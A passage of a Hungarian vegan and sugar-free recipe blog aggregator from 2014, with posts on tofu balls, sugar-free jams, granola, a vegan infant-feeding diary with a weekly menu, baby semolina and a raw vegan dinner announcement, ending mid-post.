ZIZI10. Jó vásárlást mindenkinek!  

Snidlinges tofu fasírt golyók, zöldséges krumplipürével

2014. szeptember 9. Zöld Avocado 

Snidlinges tofu fasírt golyók, zöldséges krumplipürévelEzek az ál fasírtgolyók mennyeiek! Olyan, mintha húsból lennének, de annál sokkal könnyebbek, puhábbak, egészségesebbek, és ízletesebbek! :-) snidlinges tofu fasírt, zöldséges krumplipürével Hozzávalók: kb.45 db 3 cm átmérőjű tofu golyóhoz 1000 g tofu (GMO mentes) 1 fej lila hagyma 3 gerezd fokhagyma 2 szál közepes sárgarépa 1/­­2 bögre kukoricaliszt, vagy rizsliszt 1 ek őrölt lenmag beáztatva vízbe (tojás helyett) 1 marék friss petrezselyem mustár, Himalája só, fehér bors,  édesnemes pirospaprika  2 szál snidling a zöld résszel együtt 1/­­2 bögre tökmag és szotyi keverék 1/­­2 bögre darált dió (nem cukrozott, és nem dejó) (1 ek útifűmaghéj) (1 ek sörélesztő por) kevés zsemlemorzsa, amibe beleforgatjuk majd a golyókat kisütés előtt Zöldséges krumplipüréhez: 1 kg krumplipürének való burgonya 2 szál közepes sárgarépa  1 kisebb cukkini  Fokhagymás kukorica salátához: 1 nagy organikus/­­bio tejföl (500 ml) 2 gerezd fokhagyma Himalája só, frissen őrölt fekete bors 1 bio kukorica konzerv (cukormentes) 1 szál snidling (2 marék bab csíra) Elkészítés: fokhagymás kukorica saláta - jobb sarokban a képen Kezdjük a  salátával, mert annak jó, ha áll a hűtőben egy kicsit, hogy az ízek összeérjenek. Balázs imádja a tejfölös kukorica salátát, így gyakran kerül az asztalra fasírtok mellé. Manapság próbálom ezt is a lehető legreformosabb formában elkészítni. Ez egy roppant egyszerű saláta! :-) A nagy tejfölt (vagy natúr organikus joghurtot, görög joghurtot) beleöntjük egy mélyebb tálba. Hozzáadjuk ízlés szerint a fűszereket, a kukorica konzervet, az apróra vágott snidlinget, és fokhagymanyomóval a 2 gerezd fokhagymát (ha valaki szereti a vámpírokat üldözni, tehet bele többet is).  Ha van otthon, akkor 2 marék babcsírával tehetjük értékesebbé ezt az egyszerű salátát. színes, zöldséges krumplipüré A krumplipürét azt hiszem nem kell senkinek bemutatnom. Készítsük el a hagyományos módon, a kívánt mennyiségben, ahogy azt korábban szoktuk. Miután elkészült a számunkra tökéletes püré, cifrázzuk egy kicsit, és csempésszünk bele életet! ;-) Pucoljunk meg 2 közepes sárgarépát, mossunk meg egy kisebb cukkinit, és mindkét (mindhárom) zöldséget reszeljük le a nagy lukú reszelőn julienre. Keverjük a friss, élettel teli, nyers zöldségeket a krumplipürével, és ezzel el is készült az üde burgonya köret.  És akkor nézzük a tofu fasírtokat, amik szintén egyszerűen elkészíthetőek, és csak a kisütögetés vesz igénybe néhány percet, de nem annyit, mint egy húsos fasírt. Tegyük a hozzávalókat  egy keverő tálba ilyen formán: - A napraforgómagot és diót daráljuk porrá a darálóban. - A tökmagot egészben tegyük bele. - A lilahagymát, fokhagymát és sárgarépát egy fél dl. vízzel turmixoljuk pépessé a turmix géppel.  - A snidlinget/­­metélőhagymát karikázzuk fel kb. fél cm-es karikákra. - A tofut (a lé nélkül) morzsoljuk bele a tálba a kezünkkel. - Adjuk hozzá a lisztet, a fűszereket, az apróra vágott petrezselymet, és az előre beáztatott lenmagot. (A vízben áztatott lenmag, 1-2 óra elteltével kocsonyásodni kezd. A vega receptekben a tojás helyettesítőjeként, egyfajta kötőanyagként használatos. Érdemes néha ezt tenni az ételeinkbe a tojás helyett, mert a lenmag is rengeteg jótékony tulajdonsággal bír.)   - ha van otthon, akkor mehet bele a sörélesztő és útifűmaghéj is, amik szintén javítanak a fasírt tápértékén. Persze ha még nem szereztük be ezeket a super táplálékokat, kihagyhatóak, bár a sörélesztő por különleges és finom ízt is kölcsönöz az ételeknek. (Ez a két super táplálék elég drága a bio boltokban, de olyan kis mennyiségben fogy, hogy nagyon sokáig elég, és akkor már hosszú távú befektetésnek számít. :-) ) nyers tofu golyókMiután a hozzávalók a megfelelő formában a keverőtálban landoltak, kézzel összegyúrjuk őket, míg egy nagyjából homogén anyagot kapunk. Ez lesz a fasírt alapanyaga, a mű hús. ;-) Közben egy magas falú serpenyőben, vagy lábasban olajat hevítünk, úgy, ahogyan azt a rántott hússal szoktuk. Jó lenne, ha ez az olaj, kókuszzsír lenne, vagy olíva olaj, de tudom, hogy mindkettő túl drága ahhoz, hogy kisütéshez "pazaroljuk" őket. Tehát maradhat a hagyományos napraforgó olaj, ha sajnáljuk a drágább zsiradékot. A forró olajba aztán a szokásos módon kisüthetjük a kb.3 cm átmérőjű golyócskákat. A keverőtálból kézzel golyókat formázunk, amiket meghempergetünk egy kis zsemlemorzsában, és aztán tesszük a forró olajba.  Ha elég forró az olaj kb.10 perc alatt készre sülnek a vega fasírtok. Egy papírkéztörlővel bélelt tálba kiszedve, hagyjuk, hogy a felesleges zsiradék lecsöpögjön, és ne a gyomrunkat terheljük vele.  tofu fasírt golyók A behűtött fokhagymás kukorica salátával, és színes krumplipürével tálalva teljes értékű, ízletes, és egészséges fogás tálalható. A húsevők is megnyalják mind a 10 ujjukat a puha és könnyed tofu golyócskák után! Próbáljátok ki! ;-)   Megjegyzés: Készítsetek házi "zsemle"morzsát barna kenyérből pár perc alatt! Piritós sütőbe /­­ toasterbe tegyünk bele pár szelet kenyeret, amit aztán ha elkészült, darálóban daráljunk porrá, és kész is a házi barna zsemlemorzsa. A nagypapám annó ezt réz mozsárban és sütőben készítette. A megmaradt kenyeret felkockázva betette egy tepsiben a sütőbe, és szárazra sütötte közepes hőmérsékleten. A kiszáradt és kihűlt kenyér kockákat mozsárba tette, és kézzel porrá zúzta. Akkoriban még jobb minőségű kenyerek készültek, így ezt a házi zsemlemorzsát el tudták tárolni hosszabb ideig. Ha ugyanazt ma megpróbálod, kb. 1 hét után zöld és kék színben pompázó új élet keletkezik az elrakott zsemlemorzsádon. :-) Ezért tanácsos csak mindig annyi házi kenyérmorzsát készíteni, amit azonnal felhasználsz.   Megjegyzés2:  Mi is az a tofu? Bővebben itt olvashatsz róla: tofu, avagy a szójasajt 

Cukormentes rebarbarás szederlekvár

2014. szeptember 5. Zizi kalandjai 

Cukormentes rebarbarás szederlekvár Igyekszem kihasználni az utolsó pillanatokat… amíg lehet kapni nyár végi gyümölcsöket a piacokon, addig veszem és fogyasztom őket. Na persze nem csak én, hanem az egész család. Amikor elkezdtem előkészíteni ennek a lekvárnak a hozzávalóit, Ádi rákattant a szederre és alig bírtam lebeszélni néhány szem után, hogy erre anyának most nagy szüksége van, mert fotóznia kell, meg lekvárt főzni belőle. Ígértem neki őszibarackot cserébe, szerencsére elfogadta, így most ez a bejegyzés is megszülethet! Nagyon egyszerű a dolog… végy egy adag szedret, egy adag rebarbarát, keverd össze egy kis juharsziruppal, citromlével és citrom reszelt héjával és főzz belőle lekvárt. Ennyi! Nem vagyok egy nagy lekvár főző, na nem azért, mert nem szeretem enni és csinálni, hanem mert helyem nincsen tárolni. Ez a szederlekvár nem lesz nagy adag és hűtőben tartva maximum 2 hétig áll el, szóval gyorsan kell fogyasztani, de szerintem ezzel nem lesz gond! Nem tudom, hogy ti járatok-e már úgy, hogy próbáltátok egy citromnak a héját reszelni, de a reszelő nem volt elég éles és így a citrom héja csak maszatolódott a reszelőn. Nos, én számtalanszor jártam így… nem igazán panaszkodtam I.-nek erről, de valamit megérezhetett, mert egyik évben kaptam tőle egy Microplane reszelőt karácsonyra. Neki fogalma sem volt, hogy létezik a Microplane és, hogy én titkon vágytam egyre, de az eladó az üzletben rábeszélte, hogy vegye meg a gasztroblogger barátnőjének, mert ennek biztosan örülni fog. Hát, amikor kinyitottam az ajándékot, sikítoztam: “Úristen, van végre Microplane reszelőm!”. I. meg örült, hogy milyen jól választott ajándékot! Hát így indult a történetem a Microplannel. Nemrég pedig csomagot és lehetőséget kaptam a Microplane magyarországi forgalmazójától, hogy az egyik terméküket, a Citrus Bajnokot teszteljem. Szuper tuti, bika éles kis reszelő rozsdamentes acél pengékkel (melyek orvosi fémből készülnek). A nyél alján található kör alakú pengékkel mesteri spirálokat készíthetünk a citrusok héjából, amit aztán koktélokba, vagy díszítésként is használhatunk (na én ezt még nem teszteltem, de egy koktélpartin biztosan be fogom vetni). Szóval egy Microplane reszelő nem maradhat ki a háztartásunkból, ha egy minőségi, tartós, éles társra vágyunk a konyhában! Na, de jöjjön már a recept, ugye? Cukormentes rebarbarás szederlekvár Hozzávalók: - kb. 260 g szeder - kb. 260 g rebarbara (5-7 szál, mérettől függően), felkockázva - 1/­­2 bögre juharszirup - 1 citrom reszelt héja - 1 evőkanál frissen facsart citromlé Egy lábasban keverjük össze a hozzávalókat és közepes lángon tegyük fel főzni. Kb. 10 perc után, a gyümölcs kezd egy kicsit összeesni, ekkor fakanállal nyomkodjuk egy kicsit pépesre a gyümölcsöket. Forraljuk fel, majd közepes lángon főzzük 25-30 percig, amíg besűrűsödik. Töltsük fertőtlenített üvegekbe, majd ha kihűlt tegyük hűtőbe fogyasztásig. Vegyük le az üveg fedelét… És fogyasszuk a lekvárt friss kuglófra kenve… ***** A Microplane Citrus Bajnok reszelőt a Grater Hungary Kft. biztosította a teszteléshez. A véleményem csakis a sajátom.

Táplálj helyesen édesanyám! (5. rész)

2014. augusztus 5. Zizi kalandjai 

Táplálj helyesen édesanyám! (5. rész) Előtte /­­ Utána Az a bizonyos csokipuding, aminek az utolsó falatjáért harcolt anya és fia, és ami az első szülinapi torta krémje is volt A legutolsó bejegyzés óta elég sok idő eltelt… fejemben a sok-sok információ, igyekszem részletesen leírni nektek. Többen jeleztétek, hogy egy heti menüre is kíváncsiak lennétek, hát, akkor egy ilyet is leírok nektek. Még jó, hogy születése óta (!!!) írom, hogy mikor mit evett Ádi, szóval dokumentálva van az étkezés, így a heti menü megosztása sem akadály! Májusban végre megújult a természet, ami a piacok kínálatán is látszódott, így egyre több újdonságot tudott kipróbálni Ádi. Nagy sikert aratott minden gyümölcs, amit evett: eper, málna, ribizli, szeder, cseresznye, meggy, szilva, őszibarack, sárgabarack, sárgadinnye. Talán a görögdinnyéért nem rajong annyira, de azt is megeszi. A legnagyobb kedvenc egyértelműen a meggy és az áfonya. Nem tud belőlük eleget enni… Áfonyából képes akár 200 grammot is benyomni egyszerre. Képzelhetitek, hogy 200 gramm áfonya után milyen színű lesz a végtermék… hát, lila! A zöldség választékból szinte mindent kipróbáltunk, ami szóba jöhetett: spárga, zöldborsó, zöldbab, tök, cukkini, padlizsán, paradicsom (ez gyümölcs!), paprika, kukorica, káposzta, uborka, olívabogyó, zeller, karalábé, karfiol, brokkoli, avokádó (ez gyümölcs!). A spenót, mángold, petrezselyem, sárgarépa továbbra is szerepel az étlapon és alkalmanként most már burgonya is kerül a tányérra. Az egyedüli, ami nem nagyon nyerte el a tetszését, az a sóska volt, de hát ez egy eléggé megosztó zöldség. Kipróbáltuk a zöld turmixot is. I. csinált egy fantasztikusat: mángold, banán, alma, kevés citromlé, víz, rizstej összekeverve… az arányokat ne kérdezzétek, de tényleg nagyon finom volt, ezért is aratott sikert Ádinál. Második alkalommal én csináltam, ha jól emlékszem, nem volt itthon alma, így az nem került bele és nem is lett olyan ízletes, Ádinak sem ízlett annyira, de nem adjuk fel! Kineveztük apát zöld turmix specialistának, így ezért az italért és más smoothie-ért ő a felelős. Készített már málna rizstej smoothie-t (turmixolás, majd magok leszűrése), Ádi ezt is itta nagyon! Gyümölcsökön és zöldségeken kívül Ádi eszik tésztát (többnyire durum- vagy tönkölylisztből készültet), kölest, barnarizst, jázminrizst, kukoricadarát, rozs-vagy teljeskiörlésű tönkölylisztből készült kenyeret (lehetőleg élesztőmenteset), zabpelyhet, rizspelyhet, tönkölydarát, lencsét, csicseriborsót, sörélesztő pelyhet (B12 vitamin pótlásra), vegán sajtot (nem szójaalapú, nagyon-nagyon finom, az egész család imádja!). Mandulatejet- és rizstejet (cukormentes) smoothie-k készítéséhez használok, valamint a reggeli kásához. Külön magukban nem szokta inni őket, de biztosan ki fogjuk próbálni, de most  nyáron jobbnak látom frissítő gyümölcsleveket és vizet adni szomjoltásra. Rágcsált már diót és egy kis kesudiót. Többen kérdeztétek, hogy mivel pótoljuk az állati fehérjét. Különösebben nem görcsölök rá erre a témára, de néhány dolgot érdemes szem előtt tartani vegán táplálkozás esetén. Már ebben a cikkben is leírtam, vagyis idéztem, hogy “Az ember az emésztés során a fehérjéket aminosavakra bontja le, ezekből építi fel a saját fehérjéit. Nem az elfogyasztott fehérjét építi be tehát, hanem az aminosavakat. Ezért minden alapot nélkülöz az a kijelentés, miszerint az állati fehérje azért jobb, mint a növényi, mert közelebb van szerkezetében az emberihez. A másik alaptalan tévhit, hogy a növények nem teljes értékű fehérjét tartalmaznak, ezért rosszabb minőségűek. Ez a mítosz az esszenciális aminosavakra vezethető vissza. Nyolc aminosavról van szó, amelyeket a szervezet nem tud előállítani, ezért mindenképpen kívülről kell őket a szervezetbe vinni. A természet bölcs, minden élőlény ugyanazokból az aminosavakból épül fel, így a növényekben és az állatokban egyaránt megtalálhatóak az ember számára esszenciális aminosavak. Igaz, az állati fehérjék mind a nyolc aminosavat tartalmazzák, a növények pedig általában egyszerre nem az összeset. Azt nevezi a természettudomány teljes értékű fehérjének, amely az összes, az adott élőlény számára esszenciális aminosavval rendelkezik. A növények közül ilyen a kelbimbó, a sárgarépa, a kukorica, a karfiol, az uborka, a tök, a burgonya, a zöldborsó, az összes dióféle, a szezám- és napraforgómag, valamint a paradicsom fehérjéi. Nem szükséges azonban minden étkezés alkalmával teljes értékű fehérjét fogyasztani, de még naponta sem. A szervezet ugyanis “képes bármilyen aminosavhoz hozzájutni a saját tartalékából, ha az egy adott étkezésből hiányzik is.” – Dr. E. S. Nasset” (Forrás: Napfényes Étterem) Tehát a fent nevezett 8-10 növényből szezon alapján igyekszem minél többet adni Ádinak. Ezenkívül fontos az ételek párosítása (ez a komplettálás) is. Például a gabonafélék és hüvelyesek együttes fogyasztásával teljesértékű fehérjéhez jutunk (pl: bab-zab fasírt, zöldborsós rizottó). Még többet a komplettálásról és az ételek párosításáról itt olvashattok. Nem csak bűvölte a spenótot, hanem meg is ette Mindent mértékkel fogyasztunk és a hangsúly a harmónián van. Ádi nagyon jó étvágyú kisfiú, öröm nézni, ahogyan eszik. Egyenesen megkívánja az ember az ételt, olyan jóízűen falatozik, nyugodtan, kényelmesen. Jól fejlődik, egészséges, zsurmó, mozgékony, igazán jól táplált baba. Továbbra is igyekszem tartani a vegán étrendet számára, azonban tudom, hogy bizonyos szituációkban nehéz kivitelezni, hogy teljesen kizárjuk a tojást vagy tejtermékeket. Ha így lesz, nem fogok belőle problémát csinálni, ha alkalmanként eszik egy-két olyan dolgot, amelyekben ezek megtalálhatók. A nagy kérdés, amit mindig megkapok, hogy ha Ádi kér húst, akkor adok-e majd neki. A válaszom természetesen igen, hagyni fogom, hogy kipróbálja, de valószínűleg a nagyi fogja elkészíteni neki az ételt. Tökfőzelék készítésekor egyszer csak elcsent egy darab meghámozott tököt az asztalról és nekiesett… a tapasztalás a legfontosabb! Amit még szintén nem evett és érdemes megemlíteni, az a cukor. Ezt még semmilyen formában nem evett, de még mézet, juhar- vagy agavé- vagy rizsszirupot sem adtam neki és ahogy ezt a környezetemben tapasztalom, igen jó döntésnek bizonyult. A cukor teljesen megváltoztatja az ember ízérzékelését és egy alma már nem fog olyan édesnek tűnni, ha rendszeres “cukorfogyasztókká” váltunk. Ezt is igyekszem elhúzni, ameddig lehet, aztán majd mértékkel adni neki kókuszvirág cukrot, nádcukrot, juharszirupot, természetesen többnyire sütikbe belesütve. És akkor lássunk egy heti menüt (követem a szezonalitást, de ez most több hét menüjéből lett összemixelve, ezért fordul elő benne az eper és az őszibarack is egyszerre)… A reggeli kásák rizs- vagy mandulatejjel készülnek, adok hozzá csipet fahéjat, egy teáskanál mandulavajat és gyümölccsel tálalom. Tízóraira többnyire egyféle gyümölcsöt eszik, de előfordul, hogy főzés közben adok neki egy darab répát is, hogy elrágcsálja. Az ebéd szinte mindig főtt étel és az egyszerűségre törekszem, hogy minél gyorsabban legyen kész. Uzsonnára többféle gyümölcsöt eszik, persze nem egyszerre, hanem az ebéd és a vacsora között akár kétféle gyümölcsöt is eszik, meg lehet, hogy még kölesgolyót is rágcsál. A vacsora az esetek többségében hideg, kenyér valamivel megkenve, zöldségekkel tálalva. 1. nap Reggeli: banános palacsinta Tízórai: áfonya Ebéd: tökfőzelék vegán sajttal Uzsonna: alma, málna, kölesgolyó Vacsora: vegazsíros kenyér, paradicsom, avokádó 2. nap Reggeli: tönkölykása almával Tízórai: eper Ebéd: cukkinis lecsó barnarizzsel Uzsonna: cukor- és élesztőmentes szilvás rétes (biopiacról) Vacsora: vegazsíros kenyér, paradicsom, paprika, avokádó, vegán sajt 3. nap Reggeli: zabpehely kása banánnal Tízórai: nektarin Ebéd: brokkoli pestós tészta (sörélesztő pehely a tetejére szórva) Uzsonna: áfonya, kölesgolyó Vacsora: humuszos kenyér, paradicsom, olívabogyó, avokádó, vegán sajt 4. nap Reggeli: rizspehely kása őszibarackkal Tízórai: áfonya Ebéd: zöldségleves teljeskiörlésű vegán betűtésztával Uzsonna: sárgabarack, málna Vacsora: vegazsíros kenyér, paradicsom, brokkoli csíra, avokádó, vegán sajt 5. nap Reggeli: tönkölykása banánnal Tízórai: őszibarack Ebéd: tökfőzelék bab-zab fasírttal Uzsonna: sárgabarack, áfonya, kölesgolyó Vacsora: lencsepástétomos kenyér, paradicsom, avokádó, vegán sajt 6. nap Reggeli: tönkölykása őszibarackkal Tízórai: vegán cukormentes szilvalekváros palacsinta (biopiacon) Ebéd: lecsó polentával Uzsonna: őszibarack, kölesgolyó Vacsora: szezámmagpástétomos kenyér, paradicsom, paprika, avokádó 7. nap Reggeli: rizspehely kása banánnal Tízórai: málnás rizstejes smoothie Ebéd: borsófőzelék karfiol-quinoa fasírttal Uzsonna: őszibarack, kölesgolyó Vacsora: vegazsíros kenyér, olívabogyó, paradicsom, avokádó ***** Ha kérdésetek van, tippetek, ötletetek, esetleg egy tuti baba receptetek, írjátok meg kommentben! A leírtak a saját tapasztalataim (és tájékoztató jellegűek!) és a mások által leírt, általam elfogadott nézeteket tükrözik. Kérjünk tanácsot, segítséget másoktól, szakemberektől, olvassunk utána a hozzátáplálás/­­baba étkeztetés témájának, aztán hallgassunk az anyai megérzésünkre is, figyeljük meg, hogy mi ízlik a babának, vállaljuk fel a döntésünk felelősségét és cselekedjünk saját belátásunk szerint. Majmos előke, tálka, tányér és kanál: {Monkie}. Táplálj helyesen édesanyám! (1. rész) Táplálj helyesen édesanyám! (2. rész) Táplálj helyesen édesanyám! (3. rész) Táplálj helyesen édesanyám! (4. rész)

Egészséges, cukormentes alternatíva Cini Minis és fahéj rajongóknak

2014. június 19. Fitt Nők 

Egészséges, cukormentes alternatíva Cini Minis és fahéj rajongóknakA boltban láttam, hogy már többfajta kölesgolyó is kapható, többféle ízesítésben. Nem mindegyiket venném meg sósak közül a benne található “élesztőkivonat” alkotórész miatt, mely valószínű ízfokozót, nátrium-glutamátot tartalmaz, de az édesek körében (kakaós és fahéjas) a hozzáadott egyebek nem vészesek. Régebben már készítettem lenmagból aszalva egy Cini Minis utánzatot, mely nagyon finomra sikerült, itt olvashatjátok, hogyan: Fahéjas lenmag falatkák: http:/­­/­­www.fittnok.hu/­­fahejas-lenmag-falatkak-cini-minis-rajongoknak A mostani változat ezzel a kölesgolyóval készült, ám, mivel ez így egyszerűen növényi tejbe dobva kicsit snassz lenne, ezért felturbóztam kicsit. Hozzávalók:  egy csésze növényi tej (pl. vaníliás rizstej – Müllerben kapható), vagy natúr növényi tej vanília porral, csipet fahéj, növényi szirup vagy méz ízlés szerint, 2-3 evőkanálnyi barna köles (vadköles) őrlemény (kölesliszt), fahéjas kölespehely Elkészítés: A növényi tejet meglangyítjuk, majd hozzákeverjük a hozzávalókat, végül beleszórjuk a kölesgolyókat. Isteni finom! Jó étvágyat!  

Barackos gírz 6+, 8+

2014. június 5. BioBrigi 

Barackos gírz 6+, 8+ Mindig agyal az ember, hogy mit kéne adni a gyereknek. A múlt héten egyik bejegyzés alatt elgondolkoztam azon, hogy  komolyan, a cici a legjobb "találmány" gyermeketetés céljából, mert ott van bármikor, nem kell melegíteni, mindig megeszi a gyerek. Tökéletes az összetétele, egészséges, tápláló, és nem utolsó sorban viszonylag tiszta. Nem keni össze vele az etetőszéket, a kanapét, nem repül a kanálból a kaja, amibe aztán a kisokos beletenyerel, és boldogan keni, ahol csak éri... :) Nem kell gondolkoznod azon, hogy ugyan megeszi-e, és hogy megfelelő-e a fehérje tartalma, vagy elegendő ásványi anyagot viszel-e be vele a szervezetébe. Persze egy idő után nem elég, mostanra inkább már csak immunanyag átadás és bújás, megnyugvás. Ellenben agyalhatok rajta nap mint nap, mit együnk. Persze ez utóbbi is lehet cuki, ahogy tátja a kis csipogóját, vagy épp megrázza a fejét, ha jön a kanál, mert még van a szájában. Sőt olykor az is, ha szétmarcangol egy darab kiflit, vagy krumplit, és keni szét a házban, azután csodálkozva nézi, hogy az anyja mit puffog már megint. Neki meg kell tapasztalni, rá kell jönni, hogy működik, mi miért van. Ha ezt megértem, már könnyebb a vele való bánás. A barackos gríz is egy egyszerű étel. A grízt meg kell főzni vízben (vagy babatejben), majd hozzá adni az anyatejet ha hűlt, és összekeverni kevés cukormentes baracklekvárral. Bár pár hét, és jön a sárgabarackszezon, a legjobb lesz friss barackkal. Sárgabarackkal 8 hónapos kortól adható, az őszibarackot már 6 hónapos kortól már kínálhatjuk. Hozzávalók: 1 ek tönkölybúzadara 1 dl víz szűken pár kanál anyatej 1 ek baracklekvár vagy 1 érett barack 1 pici vanília A búzadarát hozzáadjuk a forrásban lévő vízhez, és sűrű kavargatás mellett a vaníliával megfőzzük. Amikor kissé hűltebb, hozzákavarjuk az anyatejet, majd a baracklekvárt is. Télen keverhetünk bele némi almát a vitamintartalom növelése céljából.

Chia magos cukormentes eperdzsem

2014. május 21. Zizi kalandjai 

Chia magos cukormentes eperdzsem Nagy érdeklődésre tett szert a Facebookra kitett ma délutáni fotó, mely szerint ki kellett találnotok, hogy mi a különleges hozzávaló a dzsemben. Ennyi kommentet még soha nem kaptam annak ellenére is, hogy csak annyit ígértem, hogy az első helyesen tippelő kap tőlem valamit ajándékba. Egy ilyen saját logóval ellátott textil bevásárlótáskát, ami szuper jól jön, ha piacra indulunk bevásárolni. Köszönöm még egyszer, hogy ilyen sokan játszottatok és ígérem lesz még ilyen! Erről jut eszembe, ne feledkezzetek meg a nyereményjátékról sem, ami a blogomon fut (május 25-ig játszhattok!). Szóval eper és befőzés, vagyis dzsem készítés. Ez volt a harmadik próbálkozásom lekvár készítés terén. Egyszer csináltam narancslekvárt, meg korábban eperből egy másik fajtát. Jól sikerült mindkettő. Szeretnék több házilag készített lekvárt, dzsemet, lecsót, savanyúságot eltenni, de hely híján ez most nem megoldható, szóval mindig csak kis mennyiséget csinálok, amit gyorsan el tudunk fogyasztani. Ráadásul ez az eperdzsem nem is áll el sokáig, mert nincsen benne cukor, ami tartósítaná. Helyette viszont van benne chia mag! Hoppá! Ugye? Pedig milyen egyértelmű, hiszen köztudott, hogy zselésítő funkciót is produkál ez az apró magocska. Én többnyire tojás helyettesítésére használom (ugyanúgy, mint a lenmagot) vegán süteményekben, ételekben, de már pudingot is készítettem belőle. A recept nem az én fejemből ugrott ki, hanem egy kanadai lány, Angela fejéből, bár lehet, hogy más is használt már chia magot dzsem készítésére, de én az ő szakácskönyvében találtam, amit nemrég rendeltem és a héten hozta haza egy barátunk a nagy Ámerikából. A “The Oh She Glows Cookbook” egy csodálatos vegán szakácskönyv, tele szuper receptekkel, gyönyörű fotókkal és inspiráló ötletekkel. Ez egy kicsi mennyiség, összesen kb. 250-300 ml dzsem lesz belőle, de az eperszezon tart még egy darabig, szóval, ha ízlik, készíthetünk belőle újabb adagot… akár duplázva a mennyiségeket. Próbáljátok ki, mert finom és gyorsan készen van! Chia magos cukormentes eperdzsem Hozzávalók 250-300 ml-hez: - 3 bögre eper, kicsumázva - 3 evőkanál juharszirup (ha nagyon érett, édes epreket használunk, ez el is hagyható) - 2 evőkanál chia mag - 1/­­2 vaníliarúd kikapart magjai (A recepthez használt bögre 250 ml-es.) Egy közepes lábasban keverjük össze az epreket a juharsziruppal és magasabb lángon kezdjük el főzni, alkalmanként keverjük meg. Ha felforrt, vegyük takarékra a lángot és villával törjük össze az eperszemeket. Keverjük bele a chia magot és takarékon főzzük tovább kb. 20 percig, amíg besűrűsödik. A végén adjuk hozzá a vaníliát, keverjük jól el és töltsük fertőtlenített üvegbe. Állítólag egy-két hétig áll el hűtőben tartva és közben egyre sűrűbbé válik. Mi egyből teszteltük: natúr puffasztott rizsszeletre mandulavajat kentünk és rá jöhetett a dzsem. Hajaj! Új kedvenc reggeli a láthatáron!

Kókuszos mandulás granola

2014. május 14. Zizi kalandjai 

Kókuszos mandulás granola Hónapok óta szinte majdnem minden reggel zab- vagy rizspehely kását eszünk reggelire. Először is a zab tejserkentő, tehát jól jött, amikor az anyatej serkentése volt a cél. Télen jól jön a melegítő hatása is, rengeteg mindennel fel lehet dobni (friss és szárított gyümölcsök, magok), meg finom, szóval mi nem untuk még meg. Sőt, Ádi sem, aki többnyire kását reggelizik úgy, ahogy mi. Aztán eszembe jutott a granola… hogy már milyen régen ettünk és megkívántam. Talán váltani kellene a kását valami ropogósra – gondoltam. Eddig kétfélét készítettem, egyszer sütőtököset, egyszer pedig cukormenteset. Most az itthon talált alapanyagokból dobtam össze egy változatot és azt kell mondanom, ez lett a legfinomabb. Annyira finom, hogy most is, amikor ezt a bejegyzést írom, granolát ropogtatok és majszolom hozzá a 70%-os étcsoki kockámat. Mennyei éjszakai desszert! Ha így folytatom, hamarabb el fog fogyni, mint gondoltam. Ki is találtam, hogy néhány hét múlva ajándékba is elkészítem, amikor Londonba utazunk és a vendéglátóinknak házilag készített gasztro ajándékot szeretnék vinni + valami finom magyar alapanyagot (például őrölt pirospaprikát Szegedről). Szóval egy kis kihagyás után újra repülőre ülünk, I. és én sokadszorra, azonban Ádinak ez lesz az első repülőútja. Kicsit izgulok, de remélem tetszeni fog neki. Percek alatt összekeverhető a granola, majd a sütőben kb. 15-20 perc alatt megsül. Nagyon gyorsan készen lesz, érdemes kipróbálni. Tudjuk, hogy pontosan milyen alapanyagok vannak benne és saját ízlésünk szerint édesíthetjük. Én kevés juharszirupot kevertem hozzá, de ez lecserélhető mézre, rizsszirupra vagy bármilyen más folyékony édesítőszerre, de akár el is hagyhatjuk és akkor teljesen cukormentes lesz. Az alapanyagokat ízlésetek és a kamrában található magok alapján variálhatjátok… végtelen sok lehetőség rejlik a granolában. Én ilyen vegán citromos joghurtba kevertem bele, de növényi tejjel és gyümölcsökkel (eper, málna) is kiváló! Kókuszos mandulás granola Hozzávalók: - 2 bögre zabpehely - 1/­­2 bögre napraforgó mag - 1/­­3 bögre tökmag - 1 bögre mandula, kicsit felaprítva - 1/­­2 bögre kókuszreszelék - 1/­­3 bögre juharszirup - 1/­­2 teáskanál só - 4 evőkanál kókuszzsír (szobahőmérsékletű) Melegítsük elő a sütőt 175 fokra. Egy nagy tepsit béleljünk ki sütőpapírral. Egy tálban keverjük össze a száraz alapanyagokat: zabpehely, napraforgó mag, tökmag, mandula, kókuszreszelék, só. A végén adjuk hozzá a juharszirupot és a kókuszzsírt és jól keverjük el. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 6-8 percig, keverjük át, majd süssük újabb 8-10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész). Üvegben/­­dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom!

Goumet nyers vegán vacsorák Budapesten

2014. április 23. Répa Konyha 

Goumet nyers vegán vacsorák Budapesten Következő  #nyersvegán vacsoráink időpontjai: Május 10. szombat 19.00 óra Budapest, Madal Cafe Május 31. szombat 19.00 óra Budapest, Madal Cafe Azaz a helyszín a már megszokott helyen, a Madal Caféban a Jászai Mari térnél! (Parkolásra a rakpartot ajánljuk.)  #vegetarianus  #vegan  #cukormentes #gluténmentes #egészséges #budapest Menük hamarosan! HELYFOGLALÁS: repakonyha@gmail.com vagy Repka Ágnes: 06-70-702-8187 4 fogásos vacsorák Ínyenc, vegan élő ételekkel (Nem használunk semmilyen állati termékeket, glutént vagy cukrot és nem melegítjük az ételeinket 40 fok fölé, így az összes tápanyag és enzim élő marad bennük.) 10-15 fős társaság Meghitt hangulat 5900 Ft/­­fő

Lekváros bukta

2014. április 14. BioBrigi 

Lekváros buktaÚjabban itthon is merek kelt tésztákat sütni, gyakrabban készül zsömle, csavart kifli, meg ilyenek. Kétszer sütöttem buktát is, bár a második adagból sok kirepedezett, mert jól megtömtem lekvárral. A "merésnek" semmi különös oka nincs, csak annyi, hogy Ábel hosszabb időszakokban van ébren, kevesebbet szopik, jobban irányítható, így ritkábban van az, hogy túlkel/­­túlsül a tészta, mert őkelme hamarabb lett éhes, nyakig kakás ésatöbbi. Persze nem jelenti azt, hogy unatkozunk, hiszen gyakrabban történnek egyéb "balesetek", mint a lépcső aljának megöntözése, és abban való tapicskolás... :) A kenyérféléket a kis legény is nagyon szereti, nehezen érti meg például azt, hogy nyersen miért nem akarom adni neki. Annak zsömle formája van már, tehát ehető. Az ő olvasatában. :) Gondoltam a lekváros bukta majd nagyon bejön neki, de a lekváros részét nem volt hajlandó megenni. Pedig vagy két hónapja emlékszem, hogy Apa nem győzte neki a szilvalekváros katonákat készíteni. Nem baj, ha nem kell, nem kell. Ilyesmit nem erőltetek. Majd később úgyis megeszi. Visszatérve a buktára. A tésztája teljesen 